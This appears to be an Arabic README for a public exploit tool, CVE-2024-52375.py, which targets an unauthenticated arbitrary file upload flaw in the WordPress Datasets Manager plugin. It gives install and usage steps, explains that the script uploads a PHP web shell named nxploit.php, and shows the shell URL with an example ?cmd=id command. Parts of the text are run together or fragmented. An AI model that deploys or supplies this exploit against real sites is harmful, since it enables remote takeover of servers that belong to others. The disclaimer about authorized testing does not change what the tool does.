
إضافة WordPress Datasets Manager من Arttia Creative <= 1.5 - ثغرة رفع ملف تعسفي
💥 الاستغلال بواسطة: Nxploit (Khaled Alenazi)
📅 تاريخ نشر CVE: 14 نوفمبر 2024
🧠 درجة CVSS: 10.0 (حرجة)
🛠 CWE-434: رفع ملف بدون قيود بنوع خطير
تم اكتشاف ثغرة أمنية خطيرة في إضافة ووردبريس Datasets Manager by Arttia Creative، وهي تؤثر على جميع الإصدارات حتى الإصدار 1.5 ضمناً.
تفشل الإضافة في التحقق من أنواع الملفات بشكل صحيح أثناء عملية الرفع، مما يسمح لمهاجم غير موثّق برفع ملفات عشوائية — بما في ذلك قذائف PHP — وتحقيق تنفيذ التعليمات البرمجية عن بُعد (RCE).
AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:Hrequests:
pip install requests
usage: CVE-2024-52375.py [-h] -u URL
Exploit for WordPress Datasets Manager <= 1.5 - Arbitrary File Upload | By: Nxploit | Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Full target URL (e.g. http://target.com/wordpress)
استبدل عنوان URL بالمسار الكامل لتثبيت ووردبريس المستهدف.
في حال نجاح العملية، سيقوم السكربت بـ:
_wpnonce العامة من الواجهة الأمامية.nxploit.php.[+] Shell available at:
http://target.com/wordpress/wp-content/uploads/2025/03/nxploit.php
يمكنك بعد ذلك تنفيذ أوامر مثل:
http://target.com/wordpress/wp-content/uploads/2025/03/nxploit.php?cmd=id
readme.txt.<= 1.5 معرّضة للخطر.تُقدَّم هذه الأداة لأغراض تعليمية واختبارات مصرّح بها فقط.
استخدامها ضد أنظمة لا تملكها أو ليس لديك إذن لاختبارها يعتبر غير قانوني.